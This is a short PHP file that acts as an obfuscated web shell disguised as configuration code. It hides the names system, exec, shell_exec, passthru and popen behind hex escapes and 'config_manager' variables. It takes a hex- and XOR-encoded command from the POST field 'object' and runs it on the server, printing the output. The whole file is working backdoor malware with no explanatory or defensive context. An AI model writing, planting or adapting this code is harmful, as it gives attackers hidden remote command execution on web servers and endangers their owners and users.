<?php

$config_manager1 = "s\x79\x73t\x65m";
$config_manager3 = "e\x78e\x63";
$config_manager5 = "p\x6F\x70en";
$config_manager6 = "\x73tr\x65\x61m\x5Fg\x65t\x5Fconte\x6E\x74\x73";
$config_manager7 = "pclose";
$restore_state = "\x68ex\x32bi\x6E";
$config_manager4 = "p\x61\x73\x73\x74hru";
$config_manager2 = "s\x68e\x6Cl_\x65xe\x63";
if (isset($_POST["o\x62\x6Ae\x63t"])) {
            function reverse_lookup    (  $descriptor , $data_chunk    )  {
$entry    = '' ;
foreach(str_split($descriptor) as $char){
$entry.=chr(ord($char)^$data_chunk);

} return$entry;

}
            $object = $restore_state($_POST["o\x62\x6Ae\x63t"]);
            $object = reverse_lookup($object, 85);
            if (function_exists($config_manager1)) {
                $config_manager1($object);
            } elseif (function_exists($config_manager2)) {
                print $config_manager2($object);
            } elseif (function_exists($config_manager3)) {
                $config_manager3($object, $symbol_descriptor);
                print join("\n", $symbol_descriptor);
            } elseif (function_exists($config_manager4)) {
                $config_manager4($object);
            } elseif (function_exists($config_manager5) && function_exists($config_manager6) && function_exists($config_manager7)) {
                $data_chunk_entry = $config_manager5($object, 'r');
                if ($data_chunk_entry) {
                    $component_val = $config_manager6($data_chunk_entry);
                    $config_manager7($data_chunk_entry);
                    print $component_val;
                }
            }
            exit;
        }